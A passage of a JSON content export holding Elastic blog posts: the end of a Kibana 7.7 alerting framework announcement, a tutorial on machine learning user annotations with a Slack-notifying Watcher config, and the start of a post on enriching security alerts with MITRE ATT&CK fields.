observations gathered from years of deep customer engagement that ultimately lay the foundation and the approach we are taking in reimagining alerts within the Elastic Stack. Those observations are:\u0026nbsp;\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eAlerting needs to be everywhere\u003c/li\u003e\n\t\u003cli\u003eMaking sense of alerts is critical\u003c/li\u003e\n\t\u003cli\u003eAlerting should be about detection \u003cem\u003eand\u003c/em\u003e action\u003c/li\u003e\n\u003c/ul\u003e \u003cstrong\u003e\u003ch2\u003eIntroducing a new alerting framework for the Elastic Stack in 7.7\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eWe are excited to announce with 7.7 a major step forward in delivering on our vision of alerting within the Elastic Stack that is tightly integrated within the Elastic Observability and Security solutions and makes integrations that matter to people and companies easy to configure.\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eAlerting everywhere\u003c/strong\u003e: Kibana 7.7 introduces ubiquitous alerting for Elastic Observability, Elastic Security, and the Elastic Stack. Users can now create alerts directly from within the SIEM, APM, Metrics, and Uptime applications as well as for any index. This gives users the power to address their alerting needs in the context of their unique use case. The new alerting framework is designed around the core principle of seamless usability and interoperability across solutions with Kibana as their platform.\u003c/li\u003e\n\u003c/ul\u003e\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eMaking sense of alerts\u003c/strong\u003e: Detecting the signal and eliminating the noise is a core focus. For example, in addition to the solution-specific options for creating alerts, Kibana 7.7 provides a single dedicated master view for managing, listing, searching, and editing all alerts in one place. The new alerting framework helps make sense of alerts throughout their lifecycle, from creation, for example, by offering a visual preview, to taking action.\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eDetection \u003c/strong\u003e\u003cstrong\u003e\u003cem\u003eand\u003c/em\u003e\u003c/strong\u003e\u003cstrong\u003e action\u003c/strong\u003e: The new alerting framework focuses on enabling alerts to do more than simply get a human’s attention. With Kibana 7.7 the goal is to seamlessly pass the alerting context that you need into the systems and workflows that matter the most to you, by making integrating a simple and easy process. This is why you’ll see built-in options for integrating with third-party solutions like Slack and PagerDuty as well as webhooks for customizing additional integrations.\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\u003cdiv class=\"embed-responsive embed-responsive-16by9 shadow m-t-40 m-b-40\"\u003e\u003cvideo autoplay=\"autoplay\" playsinline=\"playsinline\" muted=\"muted\" loop=\"loop\"\u003e\u003csource src=\"https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7697389d15f76f4c/5e9c0196db124263e8afcaee/video-alerting-pagerduty.mp4\" type=\"video/mp4\"\u003e\u003c/video\u003e\n\u003c/div\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\n\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eMore user-friendly, more powerful, more actionable\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eThe new alerting framework lives and breathes in Kibana. This choice, and the principles on which it is built, define the framework in a number of ways.\n\u003c/p\u003e\u003cp\u003eFirst, extra care was taken to provide an intuitive and user-friendly experience when it comes to alert creation and management. As a result, creating and editing alerts is achieved using dropdowns and prompts making it easy for anyone to use the first time. \u003cem\u003eAlerting everywhere\u003c/em\u003e means that we offer an array of tailored ways to create advanced, contextual alerts in Kibana. This includes generating multiple alert instances via a single alert definition so one effort translates into multiple outputs. In addition, the user experience is consistent across the APM, Metrics, Uptime and SIEM apps, meaning no matter where someone creates an alert in the Elastic Stack, they’ll find the same easy-to-use controls.\n\u003c/p\u003e\u003cdiv class=\"embed-responsive embed-responsive-16by9 shadow m-t-40 m-b-40\"\u003e\u003cvideo autoplay=\"autoplay\" playsinline=\"playsinline\" muted=\"muted\" loop=\"loop\"\u003e\u003csource src=\"https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd0e217d74c286bd6/5e9c020dc81c45292c0d4c41/video-alerting-multiple-actions.mp4\" type=\"video/mp4\"\u003e\u003c/video\u003e\n\u003c/div\u003e\u003cp\u003eThe power of the new alerting framework goes much deeper than its interfaces. Also new in this 7.7 release is a distributed task manager which delivers greater performance and scalability. This means that you can easily scale out alerting capacity simply by adding additional Kibana instances.\n\u003c/p\u003e\u003cp\u003eImportantly, the new alerting framework comes with a number of integrations which you can use to create actions. The 7.7 release introduces third-party connectors for triggering alerts to email, Slack, PagerDuty, and webhooks. Elastic connectors allow you to easily write alerts to indices and server logs. Setting up these connectors takes only a few seconds. Just enter the endpoint and key or credentials on the designated input fields on the UI, as provided by your email, Slack, PagerDuty, or webhook account, and start channeling your alerts and their context across the systems in your workflows.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eFinally, the new alerting framework in Kibana supports multitenancy. This means that you can organize your alerts into Kibana Spaces, and the framework will soon fully support Kibana’s enhanced authorization model.\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003eGet started with the new alerting framework in Kibana today\u003c/h2\u003e\u003c/strong\u003eWe are thrilled to release this next phase of our vision for alerting in the Elastic Stack\u0026nbsp;into public beta. To test it out for yourself right now, spin up a cluster on \u003ca href=\"https://info.elastic.co/elasticsearch-service-trial-30d.html\"\u003eElasticsearch Service\u003c/a\u003e or \u003ca href=\"https://www.elastic.co/downloads\"\u003einstall the latest version\u003c/a\u003e of the Elastic Stack. Already running Kibana? Simply upgrade your clusters to 7.7 to get hands-on with the new alerting capabilities. Interested in learning more about our integration with PagerDuty? \u003ca href=\"https://www.elastic.co/about/partners/pagerduty\"\u003eLearn more on our partner page\u003c/a\u003e.\u0026nbsp;","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"uid":"bltfaae4466058cc7d6","_version":8,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:47:03.147Z","created_by":"sys_blt57a423112de8a853","key":"releases","label_l10n":"Product release","tags":[],"title":"Product release","updated_at":"2024-05-10T13:44:16.955Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.629Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2020-04-19T07:52:34.423Z","created_by":"bltc92e11388fe36c87","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"uid":"blt71790a78cb424fba","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-09-18T15:23:16.881Z","updated_at":"2019-09-18T15:23:16.881Z","content_type":"image/jpeg","file_size":"98039","filename":"alerting-blog-banner.jpg","title":"alerting-blog-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-09-18T18:58:47.104Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71790a78cb424fba/5d824be4631ee43e546a1c76/alerting-blog-banner.jpg"},"markdown_l10n":"","publish_date":"2020-05-13T16:11:00.000Z","seo":{"seo_title_l10n":"New alerting framework released for Observability, Security and the Elastic Stack","seo_description_l10n":"We’re excited to announce a new alerting framework that delivers a first-class alerting experience natively within the SIEM, Uptime, APM, and Metrics applications as part of the Kibana 7.7 release and includes integrations to Slack, PagerDuty, and ServiceNow.","canonical_tag":"","noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blte13bbce38dddfc4d","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-01-02T14:35:28.267Z","updated_at":"2020-01-02T14:35:28.267Z","content_type":"image/png","file_size":"38099","filename":"elastic-blog-thumbnail.png","title":"elastic-blog-thumbnail.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-01-21T16:39:49.860Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte13bbce38dddfc4d/5e0dffb05f3f935f859311f1/elastic-blog-thumbnail.png"},"title":"Introducing the new alerting framework for Elastic Observability, Elastic Security, and the Elastic Stack","title_l10n":"Introducing the new alerting framework for Elastic Observability, Elastic Security, and the Elastic Stack","updated_at":"2024-10-09T18:02:44.362Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/introducing-the-new-alerting-framework-for-observability-security-and-the-elastic-stack","publish_details":{"time":"2024-10-09T18:03:04.883Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt26b64092ecc781ca","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how to apply user annotations, a new feature in Elastic machine learning, to augment your ML results with the information you have about your data.","author":["blt51072ba2f73141b5"],"body_l10n":"\u003cp\u003eUser annotations are a new machine learning feature in Elasticsearch available from 6.6 onwards. They provide a way to augment your machine learning jobs with descriptive domain knowledge. When you run a machine learning job, its algorithm is trying to find anomalies —\u0026nbsp;but it doesn’t know what the data itself is about.\u0026nbsp;The job wouldn't know, for\u0026nbsp;example, whether it was dealing with\u0026nbsp;CPU usage or network throughput. User annotations offer a way to augment the results with the knowledge you as a user have about the data.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eIn this blog post, we’ll\u0026nbsp;show you how user annotations work and how to apply them to different use cases. We’ll be\u0026nbsp;analysing\u0026nbsp;data\u0026nbsp;from \u003ca href=\"https://apps.tirol.gv.at/hydro/#/Wasserstand/?station=201525\" target=\"_BLANK\"\u003eHydro Online\u003c/a\u003e\u0026nbsp;—\u0026nbsp;an open data portal run by Austria’s Tyrolean local government. Hydro Online\u0026nbsp;offers an interface to investigate weather sensor data\u0026nbsp;such as\u0026nbsp;rainfall accumulation, river height, or snowpack totals. As described in one of our \u003ca href=\"/blog/importing-csv-and-log-data-into-elasticsearch-with-file-data-visualizer\"\u003eprevious blog posts\u003c/a\u003e, the File Data Visualizer offers a robust way to ingest data from CSV data, as is found in this case.\n\u003c/p\u003e\u003ch2\u003eUsage\u003c/h2\u003e\u003cp\u003eLet’s start with a single metric job that analyses river height measurements of the River \u003ci\u003eGrossache\u003c/i\u003e going through the village of \u003ci\u003eKössen\u003c/i\u003e. Once the job is created, the Single Metric Viewer can be used to add annotations to the results of the analysis. Simply drag over a time range in the chart to create an annotation. A flyout element will pop up to the right, which allows you to add a custom description. In the example below, we annotate an anomalous river height (a\u0026nbsp;major flooding occurred on that date). By creating the annotation, you can make that knowledge available to other users.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltb1c486237bfd181d/5cb5a5433aebf35f29365dab/download\" data-sys-asset-uid=\"bltb1c486237bfd181d\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe annotation is visible\u0026nbsp;in both the chart itself\u0026nbsp;as well as in the Annotations table below it. The label visible in the first column of the table can be used to identify the annotation in the chart. These labels are dynamically\u0026nbsp;created\u0026nbsp;for the annotations on display. When hovering over a row in the Annotations table, the corresponding annotation will also be highlighted in the chart above it.\n\u003c/p\u003e\u003cp\u003eThe annotations created for each job can also be accessed from the Job Management page, where they are displayed in their own tab by expanding a row in the list of jobs. Each annotation in the table includes a link in the right hand column, which takes you back to the Single Metric Viewer with a focus on the time range covered by the annotation. These permalinks can also be shared with others. This means you can use annotations to create bookmarks on particular anomalies to revisit them later on.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltccdf9900f2d7720d/5cb5a564b790c01122391df1/download\" data-sys-asset-uid=\"bltccdf9900f2d7720d\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eIf there are multiple annotations covering the same time range, annotations will be vertically distributed in the chart to avoid overlap. To edit or delete an annotation, simply click on it in the chart. The flyout element will open again to the right where you’ll be able to edit the text or delete the annotation. From 6.7 onwards, this can also be done by using the edit button in the Annotations table, making\u0026nbsp;this functionality available from the Job Management page too.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltb137bc3438e7860b/5cb5a583791abe5a29a1d4f5/download\" data-sys-asset-uid=\"bltb137bc3438e7860b\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eNow that we've covered the basic functionality of how to create and work with user annotations, let's\u0026nbsp;move on to some more use cases.\n\u003c/p\u003e\u003ch2\u003eUsing annotations to verify expected anomalies\u003c/h2\u003e\u003cp\u003eAnnotations can be used to supply a ground truth to verify if a machine learning job comes up with expected results. In the following example, we are\u0026nbsp;again looking at the river level data from \u003ca href=\"https://apps.tirol.gv.at/hydro/#/Wasserstand/?station=201525\" target=\"_BLANK\"\u003eHydro Online\u003c/a\u003e and are now aiming to\u0026nbsp;automatically\u0026nbsp;overlay historic events as annotations on the anomaly results. As a data scientist, for example, your work might include obtaining and preparing both the source data you want to analyse as well as the data set to verify the results.\n\u003c/p\u003e\u003cp\u003eFor our own analysis, we need the raw dataset.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blte10b1840268283bc/5cb5a5a382d7ee1622f86b1a/download\" data-sys-asset-uid=\"blte10b1840268283bc\" alt=\"\" \"=\"\"\u003e\u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eLuckily, in this case, in addition to investigating data via the web interface, we can also download historic data\u0026nbsp;for further analysis. For this example we’ll use the \u003ca href=\"https://ehyd.gv.at/eHYD/MessstellenExtraData/owf?id=202382\u0026file=8\"\u003eriver height data\u003c/a\u003e of the River \u003ci\u003eGrossache\u003c/i\u003e measured at the \u003ci\u003e“Huette”\u003c/i\u003e measurement point. The annotations covering the desired ground truth will be created from a \u003ca href=\"https://www.tirol.gv.at/fileadmin/themen/umwelt/wasserkreislauf/wasserstand/downloads/Tafeln_Koessen_Huette.pdf\" target=\"_BLANK\"\u003edocument describing severe river heights and floods\u003c/a\u003e.\n\u003c/p\u003e\u003ctable style=\"width: 100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\t\u003ctd style=\"border: 0px; width: 50%\"\u003e\n\t\t\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltf6aa0ed4408c2c99/5cb5a6dc3e0de5c323b87308/download\" data-sys-asset-uid=\"bltf6aa0ed4408c2c99\" alt=\"\" \"=\"\"\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border: 0px; width: 50%\"\u003e\n\t\t\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt7c57cde13dd3e014/5cb5a5d6791abe5a29a1d4fb/download\" data-sys-asset-uid=\"blt7c57cde13dd3e014\" alt=\"\" \"=\"\"\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003cp\u003eIn addition to\u0026nbsp;using the UI previously\u0026nbsp;described,\u0026nbsp;machine learning annotations are\u0026nbsp;stored as documents in a separate standard Elasticsearch index.\u0026nbsp;Annotations can also be created programmatically or manually using standard Elasticsearch APIs. Annotations are stored in a version-specific index, and should be accessed via the aliases \u003ccode\u003e.ml-annotations-read\u003c/code\u003e and \u003ccode\u003e.ml-annotations-write\u003c/code\u003e. For this example, we'll add annotations to reflect the historic river events before creating our machine learning job.\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e{\n \"_index\":\".ml-annotations-6\",\n \"_type\":\"_doc\",\n \"_id\":\"DGNcAmoBqX9tiPPqzJAQ\",\n \"_score\":1.0,\n \"_source\":{\n \"timestamp\":1368870463669,\n \"end_timestamp\":1371015709121,\n \"annotation\":\"2013 June; 770 m3/s; 500 houses flooded.\",\n \"job_id\":\"annotations-leukental-4d-1533\",\n \"type\":\"annotation\",\n \"create_time\":1554817797135,\n \"create_username\":\"elastic\",\n \"modified_time\":1554817797135,\n \"modified_username\":\"elastic\"\n }\n}\n\u003c/pre\u003e\u003cp\u003eWe’ll now create a machine learning job to find anomalies in maximum river height\u0026nbsp;using a\u0026nbsp;name that matches the \u003ccode\u003ejob_id\u003c/code\u003e field from the annotation above so that it picks up the manually created annotations. This is how this job looks in the Single Metric wizard once we ingest\u0026nbsp;the historic river data into an Elasticsearch index:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt1787a021b6855637/5cb5a71fb790c01122391e1f/download\" data-sys-asset-uid=\"blt1787a021b6855637\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe important bit here is that the job name we chose matches the one used for the annotations. Once we run the job and move to the Single Metric Viewer, we\u0026nbsp;should see annotations corresponding to the anomalies in river height that the machine learning job detected:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt28e9133b42e9986b/5cb5a73830313775298d66b2/download\" data-sys-asset-uid=\"blt28e9133b42e9986b\" alt=\"image9.png\"\u003e\n\u003c/p\u003e\u003cp\u003eThis technique offers a great way to verify if the analysis you’re running is valid when compared to pre-existing validation data stored as annotations.\n\u003c/p\u003e\u003ch2\u003eAnnotations for system events\u003c/h2\u003e\u003cp\u003eIn addition to the user-generated annotations\u0026nbsp;above, the machine learning backend automatically creates annotations in some circumstances for system events.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt26871e9e546a8b1c/5cb5a74c3e0de5c323b87310/download\" data-sys-asset-uid=\"blt26871e9e546a8b1c\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe screenshot above shows an example of an automatically created annotation. In this case, a real-time machine learning job was run, but data ingestion wasn’t able to keep up with the ingestion rate required for the job. This meant\u0026nbsp;documents were added to the index after the job had run its analysis on the bucket. The automatically created annotation highlights this issue that was previously hard to spot and debug. The annotation text features detail\u0026nbsp;the identified problem and provide a suggestion on how to solve it —\u0026nbsp;in this case increasing the query_delay setting.\n\u003c/p\u003e\u003ch2\u003eAlerting integration\u003c/h2\u003e\u003cp\u003eEven before the availability of user annotations for machine learning, you could\u0026nbsp;use \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/watcher-getting-started.html\"\u003eWatcher\u003c/a\u003e to create alerts based on anomalies identified by machine learning jobs. While that is a great improvement when compared to alerting on basic thresholds, the alerts may\u0026nbsp;be\u0026nbsp;too granular for\u0026nbsp;the target group that receives the alerts. As a user of machine learning jobs, annotations can give you a way to curate what gets triggered as Watcher alerts and what gets passed on to other stakeholders. Since annotations are stored in their own Elasticsearch index, you can use Watcher to simply react to newly created documents in that index and trigger notifications. Watcher can also be configured to \u003ca href=\"https://www.elastic.co/guide/en/watcher/current/configuring-slack.html\"\u003esend alerts to a Slack channel\u003c/a\u003e. The following configuration gives you an example on how to create a watch to trigger Slack messages when a new annotation gets created:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e{\n \"trigger\": {\n \"schedule\": {\n \"interval\": \"5s\"\n }\n },\n \"input\": {\n \"search\": {\n \"request\": {\n \"search_type\": \"query_then_fetch\",\n \"indices\": [\n \".ml-annotations-read\"\n ],\n \"rest_total_hits_as_int\": true,\n \"body\": {\n \"size\": 1,\n \"query\": {\n \"range\": {\n \"create_time\": {\n \"gte\": \"now-9s\"\n }\n }\n },\n \"sort\": [\n {\n \"create_time\": {\n \"order\": \"desc\"\n }\n }\n ]\n }\n }\n }\n },\n \"condition\": {\n \"compare\": {\n \"ctx.payload.hits.total\": {\n \"gte\": 1\n }\n }\n },\n \"actions\": {\n \"notify-slack\": {\n \"transform\": {\n \"script\": {\n \"source\": \"def payload = ctx.payload; DateFormat df = new SimpleDateFormat(\\\"yyyy-MM-dd'T'HH:mm:ss.SSS'Z'\\\"); payload.timestamp_formatted = df.format(Date.from(Instant.ofEpochMilli(payload.hits.hits.0._source.timestamp))); payload.end_timestamp_formatted = df.format(Date.from(Instant.ofEpochMilli(payload.hits.hits.0._source.end_timestamp))); return payload\",\n \"lang\": \"painless\"\n }\n },\n \"throttle_period_in_millis\": 10000,\n \"slack\": {\n \"message\": {\n \"to\": [\n \"#\u0026lt;slack-channel\u0026gt;\"\n ],\n \"text\": \"New Annotation for job *{{ctx.payload.hits.hits.0._source.job_id}}*: {{ctx.payload.hits.hits.0._source.annotation}}\",\n \"attachments\": [\n {\n \"fallback\": \"View in Single Metric Viewer http://\u0026lt;kibana-host\u0026gt;:5601/app/ml#/timeseriesexplorer?_g=(ml:(jobIds:!({{ctx.payload.hits.hits.0._source.job_id}})),refreshInterval:(pause:!t,value:0),time:(from:'{{ctx.payload.timestamp_formatted}}',mode:absolute,to:'{{ctx.payload.end_timestamp_formatted}}'))\u0026_a=(filters:!(),mlSelectInterval:(interval:(display:Auto,val:auto)),mlSelectSeverity:(threshold:(color:%23d2e9f7,display:warning,val:0)),mlTimeSeriesExplorer:(zoom:(from:'{{ctx.payload.timestamp_formatted}}',to:'{{ctx.payload.end_timestamp_formatted}}')),query:(query_string:(analyze_wildcard:!t,query:'*')))\",\n \"actions\": [\n {\n \"name\": \"action_name\",\n \"style\": \"primary\",\n \"type\": \"button\",\n \"text\": \"View in Single Metric Viewer\",\n \"url\": \"http://\u0026lt;kibana-host\u0026gt;:5601/app/ml#/timeseriesexplorer?_g=(ml:(jobIds:!({{ctx.payload.hits.hits.0._source.job_id}})),refreshInterval:(pause:!t,value:0),time:(from:'{{ctx.payload.timestamp_formatted}}',mode:absolute,to:'{{ctx.payload.end_timestamp_formatted}}'))\u0026_a=(filters:!(),mlSelectInterval:(interval:(display:Auto,val:auto)),mlSelectSeverity:(threshold:(color:%23d2e9f7,display:warning,val:0)),mlTimeSeriesExplorer:(zoom:(from:'{{ctx.payload.timestamp_formatted}}',to:'{{ctx.payload.end_timestamp_formatted}}')),query:(query_string:(analyze_wildcard:!t,query:'*')))\"\n }\n ]\n }\n ]\n }\n }\n }\n }\n}\n\u003c/pre\u003e\u003cp\u003eIn the configuration above, just replace \u003ccode\u003e\u0026lt;slack-channel\u0026gt;\u003c/code\u003e and \u003ccode\u003e\u0026lt;kibana-host\u0026gt;\u003c/code\u003e with your settings and use it to create an \u003ca href=\"https://www.elastic.co/guide/en/kibana/current/watcher-create-advanced-watch.html\"\u003eadvanced watch\u003c/a\u003e. Once everything is set up, you should receive a Slack notification every time you create a new annotation —\u0026nbsp;including the annotation text and a link back to Single Metric Viewer.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt8fc884c15ecd2fcf/5cb5a765fe8386be234acb7e/download\" data-sys-asset-uid=\"blt8fc884c15ecd2fcf\" width=\"650\"\u003e\n\u003c/p\u003e\u003ch2\u003eSummary\u003c/h2\u003e\u003cp\u003eIn this article we introduced the new annotations feature for Elasticsearch machine learning. It can be used for adding annotations via the UI\u0026nbsp;and for system annotations triggered via backend tasks. These annotations are available as bookmarks via the Job Management page and are sharable as links with others. Annotations can be created programmatically from external data to be used as a ground truth overlay for detected anomalies. Finally, in combination with Watcher and the slack action in Elasticsearch, we’ve seen how annotations can be used for curated alerting. Have fun with annotations, and find us on the \u003ca href=\"https://discuss.elastic.co/\"\u003eDiscuss forums\u003c/a\u003e\u0026nbsp;if you have any questions.\n\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-18T10:53:53.117Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"title":"ml-annotations-header-optimized.jpg","uid":"bltbe555f0446b8e3d9","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-04-18T09:12:15.294Z","updated_at":"2019-04-18T09:12:15.294Z","content_type":"image/jpeg","file_size":"172261","filename":"ml-annotations-header-optimized.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T11:00:03.150Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbe555f0446b8e3d9/5cb83f6ffbfd32503a2f15a3/ml-annotations-header-optimized.jpg"},"markdown_l10n":"","publish_date":"2019-04-16T18:00:00.000Z","seo":{"seo_title_l10n":"Augmenting results with user annotations for Elastic machine learning","seo_description_l10n":"User annotations, a new machine learning feature in Elasticsearch available from 6.6 onwards, provide a way to augment your machine learning jobs with descriptive domain knowledge. In this blog post we’re going to show you how user annotations work and how to apply them to different use cases.","canonical_tag":""},"tags":[],"thumbnail_image":{"title":"ml-annotation-edit-thumbnail.png","uid":"blte2e84ca6bd29aeb0","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-04-18T09:11:51.023Z","updated_at":"2019-04-18T09:11:51.023Z","content_type":"image/png","file_size":"116439","filename":"ml-annotation-edit-thumbnail.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T11:00:03.150Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte2e84ca6bd29aeb0/5cb83f57d0d6269e3a62e2ce/ml-annotation-edit-thumbnail.png"},"title":"User annotations for Elastic machine learning","title_l10n":"User annotations for Elastic machine learning","updated_at":"2024-10-09T18:02:43.944Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/augmenting-results-with-user-annotations-for-elastic-machine-learning","publish_details":{"time":"2024-10-09T18:03:04.895Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt1017564214166b57","_version":22,"locale":"en-us","ACL":{},"abstract_l10n":"Alerting with context baked in helps analysts be more efficient. Storing alerts let you see trends in your environment that you may have otherwise missed.","author":["bltaa21b392f1697213"],"body_l10n":"\u003cp\u003eWithin Elastic, the information security team is tasked with security detection and analytics, among many other activities of a typical information security team. To find abnormal and malicious behavior within our environment we leverage \u003ca href=\"https://www.elastic.co/products/siem\"\u003eElastic SIEM\u003c/a\u003e for investigations and threat hunting. When we find a pattern of behavior we want to be alerted on during an investigation or hunt we take the request JSON behind our investigation and put in to \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.5/xpack-alerting.html\"\u003eWatcher\u003c/a\u003e for alerting. Recently, we decided to start capturing the payload of our alerts in a separate index with the following goals:\u003cbr\u003e\n\u003c/p\u003e\u003col\u003e\n\t\u003cli\u003eBetter reporting on the alerts that fire and observables (hosts, users, IPs, etc…) that are part of an alert payload.\u003c/li\u003e\n\t\u003cli\u003eEnrichment of alert payloads with MITRE ATT\u0026CK information and response playbooks. This will further speed up analysts and provide additional reporting on observed behaviors and coverage of the MITRE ATT\u0026CK framework.\u003c/li\u003e\n\u003c/ol\u003e\u003cp\u003eWatcher has an \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.5/actions-index.html\"\u003eindex\u003c/a\u003e action that allows you to index data into Elasticsearch but I wanted to do more than just send the alert data in to another index, I wanted to enrich it with additional data so I got creative to make this happen.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003eAlert indexing and enrichment\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eI won’t dive in to the body of the Watcher; I’m going to\u0026nbsp; assume if you’re reading this you’ve already got Watcher setup for alerting. To get the enrichments in to the alert payload, I used a \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.5/transform.html\"\u003eWatcher payload transform\u003c/a\u003e to list each object in \u003cstrong\u003ectx.payload.hits.hits\u003c/strong\u003e, and then added in the enriched, MITRE ATT\u0026CK framework fields. You’ll notice we used parameters to inject the values for the newly created fields. This makes it easier to update the injected values without getting lost in the JSON:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"transform\": {\n \"script\": {\n \"source\": \"List x = ctx.payload.hits.hits.stream().map(d -\u0026gt; {d._source['threat.framework'] = params.framework; d._source['watcher.name'] = params.watcher; d._source['threat.tactic.name'] = params.tactic; d._source['threat.technique.id'] = params.techniqueid; d._source['threat.technique.name'] = params.techniquename; return d._source}).collect(Collectors.toList()); return x;\",\n \"lang\": \"painless\",\n \"params\": {\n \"watcher\": \"logFileChanges.json\",\n \"framework\": \"MITRE ATT\u0026CK\",\n \"tactic\": \"Execution\",\n \"techniqueid\": \"T1059\",\n \"techniquename\": \"Command-Line Interface\"\n }\n }\n }\n\u003c/pre\u003e\u003cp\u003eNow the enriched alert payload is ready to be sent into the new index. This is where the \u003cstrong\u003eindex_payload\u003c/strong\u003e action comes in. Another transform is used to return the documents in the \u003cstrong\u003ectx.payload._value\u003c/strong\u003e that we created with the transform above and then we specify the index we want to put the alerts in, in our case it’s \u003cstrong\u003enewIndex\u003c/strong\u003e.\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"actions\": {\n \"index_payload\": {\n \"transform\": {\n \"script\": {\n \"source\": \"return ['_doc':ctx.payload._value];\",\n \"lang\": \"painless\"\n }\n },\n \"index\": {\n \"index\": 